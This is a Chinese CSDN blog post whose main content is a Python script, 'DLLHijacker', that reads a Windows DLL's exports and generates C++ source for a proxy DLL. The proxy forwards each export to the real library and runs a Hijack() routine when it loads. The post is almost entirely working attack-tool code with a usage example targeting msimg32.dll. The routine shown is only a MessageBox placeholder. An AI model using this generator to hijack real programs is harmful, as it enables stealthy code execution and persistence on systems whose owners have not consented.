python dllhijacker

最新推荐文章于 2024-08-10 08:42:45 发布
最新推荐文章于 2024-08-10 08:42:45 发布
阅读量860 收藏
点赞数 1
分类专栏: python 文章标签: python dllhijacker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/osummertime/article/details/84789477
版权 
#_*_coding:utf-8 _*_ 
# Dll Hijacker

import os,sys,time
import pefile


def main():
    try:
        pe = pefile.PE(sys.argv[1])
        exportTable = pe.DIRECTORY_ENTRY_EXPORT.symbols
        print("[!]Find export function :[ %d ]\r\n" % len(exportTable))
        for exptab in exportTable:
            print("%3s %10s" % (exptab.ordinal, str(exptab.name, encoding = "utf-8")))
        print("\r\n[+] generating DLL Hijack cpp file ...")
        
        generate(exportTable)
        
        print("\r\n[+] generating DLL Hijack cpp file has finished!")

    except Exception as e:
        print(e)

def generate(exportTable):
    segments = r"//Generate by DLLHijacker.py\
\
#include <Windows.h>\
\
DEFINE_DLL_EXPORT_FUNC\
#define EXTERNC extern \"C\"\
#define NAKED __declspec(naked)\
#define EXPORT __declspec(dllexport)\
#define ALCPP EXPORT NAKED\
#define ALSTD EXTERNC EXPORT NAKED void __stdcall\
#define ALCFAST EXTERNC EXPORT NAKED void __fastcall\
#define ALCDECL EXTERNC NAKED void __cdecl\
\
namespace DLLHijacker\
{\
    HMODULE m_hModule = NULL;\
    DWORD m_dwReturn[17] = {0};\
    inline BOOL WINAPI Load()\
    {\
        TCHAR tzPath[MAX_PATH];\
        lstrcpy(tzPath, TEXT(\"DLL_FILENAME.dll\"));\
        m_hModule = LoadLibrary(tzPath);\
        if (m_hModule == NULL)\
            return FALSE;\
        return (m_hModule != NULL);\
    }\
    inline VOID WINAPI Free()\
    {\
        if (m_hModule)\
            FreeLibrary(m_hModule);\
    }\
    FARPROC WINAPI GetAddress(PCSTR pszProcName)\
    {\
        FARPROC fpAddress;\
        CHAR szProcName[16];\
        fpAddress = GetProcAddress(m_hModule, pszProcName);\
        if (fpAddress == NULL)\
        {\
            if (HIWORD(pszProcName) == 0)\
            {\
                wsprintfA(szProcName, \"%p\", pszProcName);\
                pszProcName = szProcName;\
            }\
            ExitProcess(-2);\
        }\
        return fpAddress;\
    }\
}\
using namespace DLLHijacker;\
VOID Hijack()\
{\
    MessageBoxW(NULL, L\"DLL Hijack! by DLLHijacker\", L\":)\", 0);\
}\
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)\
{\
    if (dwReason == DLL_PROCESS_ATTACH)\
    {\
        DisableThreadLibraryCalls(hModule);\
        if(Load())\
            Hijack();\
    }\
    else if (dwReason == DLL_PROCESS_DETACH)\
    {\
        Free();\
    }\
    return TRUE;\
}\
"
    name = sys.argv[1]
    try:
    	name.rindex('\\')
    except:
    	filename = name[0: name.rindex('.')]
    else:
        filename = name[name.rindex('\\') + 1: name.rindex('.')]
    fp = open(filename + ".cpp", "w+")
    define_dll_exp_func = ""
    for exptable in exportTable:
        name = str(exptable.name, encoding = "utf-8")
        define_dll_exp_func += r"#pragma comment(linker, \"/EXPORT:" + name +\
                            "=_DLLHijacker_" + name + ",@"+ name +"\")\n"
    segments = segments.replace('DLL_FILENAME', filename)
    segments = segments.replace("DEFINE_DLL_EXPORT_FUNC", define_dll_exp_func).replace('\\','')
    fp.writelines(segments)
    
    forward_dll_exp_func = ""
    for exptable in exportTable:
        name = str(exptable.name, encoding = "utf-8")
        forward_dll_exp_func += "ALCDECL DLLHijacker_"+ name +"(void)\n{" + \
                            "\n        __asm POP m_dwReturn[0 * TYPE long];\n    GetAddress(\""+ \
                            name + "\")();\n    __asm JMP m_dwReturn[0 * TYPE long];\n}\r\n"
    fp.writelines(forward_dll_exp_func)
    fp.close()

def usage():
    print("Usage:")
    print("    %s c:\\windows\\system32\\msimg32.dll" % sys.argv[0])

if __name__ == "__main__":
    if(len(sys.argv) <2):
        usage()
    else:
        main()
「已注销」
关注
专栏目录
基于Python的车牌识别系统实现
商务合作 / 项目定制 / 学习交流。个人vx:lovely_wml
10-16 4万+
本文将以基于Python的车牌识别系统实现为方向,介绍车牌识别技术的基本原理、常用算法和方法,并详细讲解如何利用Python语言实现一个完整的车牌识别系统。
Dll Hijacker
weixin_30652897的博客
10-27 210
#coding=utf-8 # # Dll Hijacker # # platform: Python 2.x @ Windows # # author:Coca1ne import os,sys,time import pefile def main(): try: pe = pefile.PE(sys.argv[1]) ...
探索DLLHijacker:一款创新的动态链接库劫持工具
gitblog_00081的博客
04-07 412
探索DLLHijacker:一款创新的动态链接库劫持工具 DLLHijacker项目地址:https://gitcode.com/gh_mirrors/dl/DLLHijacker 项目简介 在编程世界中, 是一个独特的开源项目,它提供了一种技术手段,允许开发者对动态链接库(DLL)的加载过程进行控制和调试。该项目由kiwings 创建并维护,旨在帮助程序员深入理解Windows操作系统中的DL...
SuperDllHijack 开源项目教程
最新发布
gitblog_00090的博客
08-10 426
SuperDllHijack 开源项目教程 SuperDllHijackSuperDllHijack:A general DLL hijack technology, don't need to manually export the same function interface of the DLL, so easy! 一种通用Dll劫持技术,不再需要手工导出Dll的函数接口了项目地址:ht...
从内网渗透来理解dll劫持的工具
qq_41071646的博客
02-12 674
dll劫持 以前学过 但是并没有注意过 但是这一天在web手的启发下 发现 dll劫持在内网渗透里面的权限维持使用率还是挺高的,, 看来不能小看老技术啊== = 一开始我的想法是 修改exe 然后直接替换exe = = dll 查找的顺序就不说了 这里就了解到三个工具 以及他们的思路 发现学习了不少 第一个是 rattler 这个 是一个查找能利用的dll 主要的...
2018年国内外最流行的二十款安全工具
Jo_kong的博客
12-30 2357
新年了,是时候扩充你的兵器库! 1、EagleEye​ EagleEye 可以帮你通过一个名字或者至少一张照片找到 Facebook 上面的个人账号,技术上采用了谷歌搜索、ImageRaider Reverse 图像搜索。同时还会在 Instagram 等其他社交媒体平台上找到相同人的账号。最终,你会得到一个 PDF 报告。 下载:https://github.com/ThoughtfulDev/...
脚本小子最爱的20款黑客工具
QIANDXX的博客
02-09 5422
在过去的一年里,你都用了哪些黑客工具呢?
Python学习笔记(干货) 中文PDF完整版.pdf
05-23
Python是一种高级编程语言,以其简洁明了的语法和强大的功能深受程序员喜爱。这份"Python学习笔记"涵盖了从环境搭建到基础语法,再到数据类型和控制结构等关键知识点,旨在为初学者提供全面的学习指导。 首先,1.1...
python专利爬虫下载
04-24
Python专利爬虫是一种用于自动化收集网络上公开专利信息的程序,尤其在知识产权研究、数据分析以及法律服务等领域有广泛应用。这个特定的爬虫项目采用了中介者模式来管理请求,以避免对目标网站造成过大的压力,可能...
Python动态满屏心形代码(turtle)
02-14
# Python使用turtle库绘制动态满屏爱心 1. 用画笔的三个形状组合出一颗爱心; 2. 将爱心封装成类; 3. 定义爱心的移动和移动到某点的函数; 4. 定义爱心的移动速度和颜色与大小相关; 5. 实现有层次感的满屏动态爱心...
Python从0到100(二十三):用Python处理图像
热门推荐
Hello大家好,我是Dream,如果帮得到你,那我深感荣幸!交流学习、商务合作:https://bbs.csdn.net/topics/614347534
05-15 4万+
Python提供了强大的库来处理图像,如Pillow和OpenCV,这些库可以帮助我们完成从简单的图像编辑到复杂的图像分析的各种任务。通过编程,我们可以自动化许多重复性的工作,提高效率。图像处理只是Python应用的冰山一角,它的能力远不止于此。继续探索Python的世界,你会发现更多令人兴奋的可能性。
信标对象文件(BOF),用于通过线程劫持进行远程进程注入-C/C++开发
05-27
信标对象文件(BOF),用于通过线程劫持进行远程进程注入,而不会产生远程线程。 cThreadHijack ___________.__ .______ ___ .__ __ __ ___ \ __ ___ / | | _________ ____ _____ __ | _ / | \ | __ | | __ | ____ ____ | | __ _ / ___ \ | | | | \ _ __ \ _ / __ \\ __ \ / __ /〜\ | | \ __ \ _ / ___ \ | | / / \ \ ___ | | | Y \ | \ / \ ___ / / __ \ _ / / _ / \ Y / | | | / __ \\ \ ___ | <\ ___> ____ | | ___ | / __ | \ ___> ____ / \ ____ | \ ___ | _ / | __ / \ __ | (____ / \ ___> __ | _ \ \ //
YOURLS v1.5 汉化版.rar
07-07
YOURLS是一款优秀的开源PHP短网址程序,充分使用AJAX技术,界面漂亮,后台功能强大。 汉化说明: 1. 汉化了部分提示信息 2. 增加了一个简洁、漂亮的前台中文界面 3. 修正部分用户在后台无法编辑和删除短网址的Bug 4. 修正其它一些小Bug 5. 尊重作者劳动,保留了官网链接
AltRun v1.5
12-26
AltRun 的1.4版经常会崩溃,这个是我使用 Delphi 10.2 修改重新编译而成的版本,解决了容易崩溃的问题。 AltRun 是一个Windows下的软件快速启动神器,使用它可以大大提高日常办公操作的效率。
GraphMaker V1.5
03-21
Graph+Maker+v1.5.unitypackage,1.5版本,支持UGUI NGUI
Hijacker-release-v1.5-beta.6.apk
05-18
Hijacker 是一个安卓平台下的无线渗透工具。它的功能非常强大,几乎集成了 aircrack-ng 套件,mdk3 和 reaver 这些工具的功能。而且采用图形化用户界面,相比命令行界面,使用起来也更加的方便简单!想要成功运行Hij ...
今天终于发布PDMtoGUI V1.5稳定版
king_xing的专栏
03-25 1193
PDMtoGUI是Delphi IDE数据字典向导,用于将PowerDesigner数据字典文件PDM,导出到GUI界面设计中,并按PDM中的数据设计设置控件的属性,并进行自动排版。它是软件工程设计到编码、GUI设计的一个衔接,可极大的降低开发人员的重复劳动,提高效率降低失误。注:PDM文件必须是XML格式的!已知对PowerDesigner PDM文件的支持为V9-V12版,因手头无更高版本
科普_DLL劫持原理与实践
KHOST的博客
09-08 1569
0x00 前言 DLL劫持算是一个老的漏洞,而且乌云漏洞库中也有很多的案例,只不过案例更多的只是验证一下,并没有教如何利用。至于为什么专门抓起来再学一遍了,唉,内网渗透需要 0x01 什么是DLL 这里先摘抄一下百度百科的解释: DLL(Dynamic Link Library)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型。在Windows中,许多应用程序并不是一个完整的可...
2018年最受欢迎的20大黑客工具(外网)
blackorbird的博客
01-03 6775
有空可以转转看看一、EagleEye - 跟踪你的朋友。使用图像识别和反向图像搜索查找他们的Instagram,FB和Twitter个人资料https://www.kit...
Python核心编程精要
"Python核心编程第二版" 是一本深入介绍Python编程的书籍,适合初学者和有经验的程序员。本书分为几个部分,首先介绍了Python语言的起源、特点和优势,包括高级特性、面向对象编程、可扩展性、可移植性等,并提供了...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值